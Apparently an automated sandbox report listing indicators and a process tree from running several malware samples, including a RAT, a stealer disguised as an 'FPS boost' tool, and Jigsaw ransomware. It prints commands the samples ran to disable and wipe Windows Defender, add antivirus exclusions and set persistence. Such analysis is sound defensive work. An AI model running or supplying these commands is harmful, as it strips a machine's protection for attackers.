4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe
4076	XMoon.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4240	888RAT 1.1.1 cracked.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3608	chrome.exe
3608	chrome.exe
2148	chrome.exe
2148	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe
Token: SeShutdownPrivilege	3608	chrome.exe
Token: SeCreatePagefilePrivilege	3608	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
3608	chrome.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe
4240	888RAT 1.1.1 cracked.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4240	888RAT 1.1.1 cracked.exe
1120	OpenWith.exe
2440	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3608 wrote to memory of 1384	3608	chrome.exe	74
PID 3608 wrote to memory of 1384	3608	chrome.exe	74
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 336	3608	chrome.exe	76
PID 3608 wrote to memory of 4056	3608	chrome.exe	77
PID 3608 wrote to memory of 4056	3608	chrome.exe	77
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78
PID 3608 wrote to memory of 2996	3608	chrome.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/ThatSINEWAVE/Malware-Samples
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8cbe39758,0x7ff8cbe39768,0x7ff8cbe39778
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:2
  2⤵
  PID:336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1832 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2868 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:1
  2⤵
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2876 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4420 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6028 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6044 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=956 --field-trial-handle=1708,i,17974988168831116068,188396120316423196,131072 /prefetch:8
  2⤵
  PID:4568

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:620

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2948

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\netwire\" -spe -an -ai#7zMap2154:76:7zEvent19858
1⤵
PID:4408

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\monsterv1\" -spe -an -ai#7zMap3623:80:7zEvent16999
1⤵
PID:1948

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\monsterv1\" -spe -an -ai#7zMap9379:80:7zEvent3789
1⤵
PID:5072

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\LegionLocker\" -spe -an -ai#7zMap18041:86:7zEvent21173
1⤵
PID:2460

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\jigsaw\" -spe -an -ai#7zMap21707:74:7zEvent10263
1⤵
PID:1112

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\evilnum\" -spe -an -ai#7zMap24400:76:7zEvent7592
1⤵
PID:3132

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\blankgrabber\" -spe -an -ai#7zMap23677:86:7zEvent1512
1⤵
PID:4044

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\888rat\" -spe -an -ai#7zMap29992:74:7zEvent24040
1⤵
PID:3168

C:\Users\Admin\Downloads\888rat\888RAT 1.1.1 cracked.exe
"C:\Users\Admin\Downloads\888rat\888RAT 1.1.1 cracked.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4240

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\" -spe -an -ai#7zMap24259:120:7zEvent28299
1⤵
PID:4312

C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe
"C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe"
1⤵
- Executes dropped EXE
PID:1872
- C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe
  "C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe'"
    3⤵
    PID:4124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\fps boost .exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:3132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1304
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\blankgrabber\Zooteds_FPS_Pack\Fps boost\1 Clean.bat" "
1⤵
PID:4048

C:\Users\Admin\Downloads\netwire\0f0298d80bf7369901281c60c.exe
"C:\Users\Admin\Downloads\netwire\0f0298d80bf7369901281c60c.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\uid.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4408
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\excel.sfx.exe
    excel.sfx.exe -p127 -dC:\Users\Admin\AppData\Local\Temp
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\excel.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\excel.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4576
    - - C:\Users\Admin\AppData\Roaming\Install\adobereader.exe
        
        "C:\Users\Admin\AppData\Roaming\Install\adobereader.exe"
        5⤵
        Boot or Logon Autostart Execution: Active Setup
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3332

C:\Users\Admin\Downloads\monsterv1\XMoon.exe
"C:\Users\Admin\Downloads\monsterv1\XMoon.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
  2⤵
  PID:456
- - C:\Windows\system32\wusa.exe
    wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\
    3⤵
    PID:3488
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\888.vbs"
  2⤵
  PID:2364

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1120

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\LegionLocker\" -spe -an -ai#7zMap6664:86:7zEvent20448
1⤵
PID:4444

C:\Users\Admin\Desktop\jigsaw.exe
"C:\Users\Admin\Desktop\jigsaw.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4240
- C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
  "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\jigsaw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3656

C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe
"C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe"
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies registry class
PID:264
- C:\Windows\System32\cmd.exe
